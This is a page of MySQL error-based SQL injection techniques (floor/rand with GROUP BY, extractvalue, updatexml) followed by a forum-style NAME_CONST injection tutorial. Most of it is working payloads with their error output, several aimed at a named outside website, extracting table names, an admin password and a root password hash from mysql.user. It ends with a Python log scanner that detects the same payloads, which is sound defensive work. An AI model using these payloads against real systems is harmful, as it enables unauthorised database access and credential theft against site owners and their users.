1. Error via floor()

The following payloads can be used:

and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2)));

Example. First a normal query:

mysql> select * from article where id = 1;
+----+-------+---------+
| id | title | content |
+----+-------+---------+
|  1 | test  | do it   |
+----+-------+---------+

If the id parameter is injectable, the following statement triggers the error:

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'

The MySQL version is disclosed in the error message. To retrieve other data, replace version() with another query. For example, to retrieve the administrator's username and password:

Method 1:
mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

Method 2:
mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

2. ExtractValue

Test statement:
and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

Actual test:
mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));
ERROR 1105 (HY000): XPATH syntax error: '\admin888'

3. UpdateXml

Test statement:
and 1=(updatexml(1,concat(0x3a,(select user())),1))

Actual test:
mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x3a,(select user())),1));
ERROR 1105 (HY000): XPATH syntax error: ':root@localhost'
More collected examples:

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)

Error: Duplicate column name '5.0.27-community-nt'

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)

Error: Duplicate column name 'root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'

Error-based injection on newer MySQL versions: injection with NAME_CONST
It's been a while since I've made an SQL injection tutorial, so I thought I should make a new tutorial using the NAME_CONST method. There are not many papers documenting this method, so it feels kind of good to be the one to make a guide for it.
Background

NAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.

Code:
NAME_CONST(DATA, VALUE)

Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.

SELECT NAME_CONST('TEST', 1)

+------+
| TEST |
+------+
|    1 |
+------+

http://dev.mysql.com/doc/refman/5.0/en/m...name-const
Intro to MySQL Variables

Once you've got your vulnerable site, let's try getting some MySQL system variables using NAME_CONST.

Code:
http://www.baido.hk/qcwh/content ... ;sid=19&cid=261

Code:
and+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--

VAR = Your MySQL variable.

MySQL 5.1.3 Server System Variables

Let's try it out on my site..

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--

Error: Duplicate column name '5.0.27-community-nt'
Now I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, it just wouldn't work there. Luckily, they work here, so let's get this going again...

Data Extraction

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--

We should get a duplicate column 1 error...

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--

Error: Duplicate column name '1'
Now let's get the tables out of this bitch..

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Let's see if it works here; if it does, we can go on and finish the job.

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Error: Duplicate column name 'com_admanage'
Now I'm going to be lazy and use mysql.user as an example, just for the sake of time.

Let's get the columns out of the user table..

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--

So mine looks like this, and I get the duplicate column name 'Host'.

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--

Error: Duplicate column name 'Host'
Woot, time to finish this bitch off..

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--

So mine looks like this...

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--

Error: Duplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'

And there we have it, thanks for reading.
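All four primitives on this page (the floor(rand(0)*2) plus GROUP BY duplicate-key trick from section 1, extractvalue and updatexml from sections 2 and 3, and the doubled NAME_CONST column from the tutorial above) leave a distinctive signature in the request URI and pair with a server error in the response. The following Python scanner, an added example that is not part of the original page, runs those signatures over constructed web-server access-log lines; the sample lines, the rule names and the functions classify_request and scan_log are all assumptions made here.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines (not taken from any real server): the first four
# carry the error-based primitives described on this page, the last two are
# benign requests that must not be flagged.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /content/detail.php?id=1+and+(select+1+from+(select+count(*),concat(version(),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a) HTTP/1.1" 500 512
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /content/detail.php?id=1+and+extractvalue(1,concat(0x5c,(select+user()))) HTTP/1.1" 500 498
10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /content/detail.php?id=1+and+1%3D(updatexml(1,concat(0x3a,(select+user())),1)) HTTP/1.1" 500 470
10.0.0.5 - - [01/Jan/2024:10:00:04 +0000] "GET /content/detail.php?id=330+and+1%3D(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)-- HTTP/1.1" 500 530
10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET /content/detail.php?id=330&sid=19&cid=261 HTTP/1.1" 200 8192
10.0.0.9 - - [01/Jan/2024:10:00:06 +0000] "GET /search.php?q=floor+plans+and+updates HTTP/1.1" 200 2048
"""

# A rule fires only when every regex in its list matches the URL-decoded,
# lower-cased request URI; the two-regex rule is order-independent because the
# page shows floor(rand(0)*2) both before and after the GROUP BY.
RULES = {
    "floor_rand_groupby": [re.compile(r"floor\s*\(\s*rand\s*\(\s*0?\s*\)\s*\*\s*2\s*\)"),
                           re.compile(r"\bgroup\s+by\b")],
    "extractvalue": [re.compile(r"\bextractvalue\s*\(")],
    "updatexml": [re.compile(r"\bupdatexml\s*\(")],
    # two NAME_CONST() columns in one SELECT: the duplicate-column-name trick
    "name_const_dup": [re.compile(r"name_const\s*\(.*name_const\s*\(")],
}

# Common Log Format: client IP, request line, status code.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<uri>\S+) [^"]*" (?P<status>\d{3})')

def classify_request(uri):
    """Return the names of all rules matching a raw request URI (decoded once)."""
    decoded = unquote_plus(uri).lower()
    return [name for name, rxs in RULES.items() if all(rx.search(decoded) for rx in rxs)]

def scan_log(text):
    """Return (ip, status, rule_names) for every log line matching a rule; a 500
    beside a matching URI is the strongest signal, since these techniques only
    leak data when the database error text reaches the client."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        names = classify_request(m.group("uri"))
        if names:
            hits.append((m.group("ip"), int(m.group("status")), names))
    return hits
```

Running scan_log(SAMPLE_LOG) flags exactly the four injected requests from 10.0.0.5, each with status 500, and leaves the two benign requests untouched.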